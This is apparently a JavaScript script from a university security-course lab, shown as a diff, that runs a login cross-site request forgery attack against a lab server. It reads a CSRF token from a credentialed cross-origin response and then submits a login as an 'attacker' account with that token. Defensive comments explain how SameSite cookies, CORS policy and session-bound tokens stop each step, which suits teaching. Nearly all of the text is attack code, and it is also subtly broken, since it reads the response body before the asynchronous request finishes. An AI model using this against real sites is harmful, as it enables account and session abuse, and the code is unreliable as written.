- // Course-lab script (note the csrfdefense/xssdefense query parameters in the URL):
- // fetches the login page cross-origin with the browser's stored cookies, reads a
- // CSRF token out of the returned HTML and then POSTs a login form carrying it.
- // Read defensively, it shows exactly which controls such a request depends on:
- // the browser attaching session cookies to a cross-site XHR (withCredentials) and
- // the foreign origin being permitted to READ the credentialed response. SameSite
- // cookies and a CORS policy that does not grant credentialed reads to other
- // origins remove both preconditions; per-session tokens that are never exposed
- // to a foreign origin make the extracted value useless even if read.
- var xhr = new XMLHttpRequest();
- // Third argument `true` = asynchronous request.
- xhr.open("GET", "http://trurl.cs.illinois.edu/login?csrfdefense=1&xssdefense=0", true);
- // Ask the browser to attach cookies to this cross-origin request. The response body
- // is only readable if the server also answers with a CORS policy allowing credentialed
- // access for this origin; otherwise the browser blocks the read.
- xhr.withCredentials=true;
- xhr.send(null);
- // extract CSRF token from page content
- var token = xhr.responseText;
- // Fixed-offset scrape of the HTML: assumes the token value starts 12 characters after
- // the literal "csrf_token" and is at most 50 characters long — tied to the exact page
- // markup and silently produces garbage if the layout differs.
- var pos = token.indexOf("csrf_token");
- console.log(pos);
- token = token.substring(pos,token.length).substr(12,50);
- console.log(token);
- // Handler is attached after send(); it only logs the body once the request completes.
- xhr.onreadystatechange = function() {//Call a function when the state changes.
- if(xhr.readyState == 4 ) { //&& http.status == 200
- console.log(xhr.responseText);
- }
- }
- // Second request: a form-encoded POST to the same login endpoint using the scraped
- // token. Server-side, a token bound to the caller's session (and compared with the
- // session, not merely for presence) plus SameSite cookies is what defeats this step.
- var http = new XMLHttpRequest();
- var url = "http://trurl.cs.illinois.edu/login?csrfdefense=1&xssdefense=0";
- http.withCredentials=true;//?csrfdefense=0&xssdefense=5
- // Credentials and token are concatenated without URL-encoding; only safe because the
- // hard-coded values contain no reserved characters.
- var params = "username=attacker&password=l33th4x&csrf_token="+token;
- http.open("POST", url, true);
- //Send the proper header information along with the request
- http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- //http.setRequestHeader('Authorization', 'Basic ' + authorizationBasic);
- // A non-simple header like Accept: application/json makes this a CORS-preflighted
- // request; a server that does not answer the preflight for this origin rejects it.
- http.setRequestHeader('Accept', 'application/json');
- http.onreadystatechange = function() {//Call a function when the state changes.
- if(http.readyState == 4 ) { //&& http.status == 200
- console.log(http.responseText);
- }
- }
- http.send(params);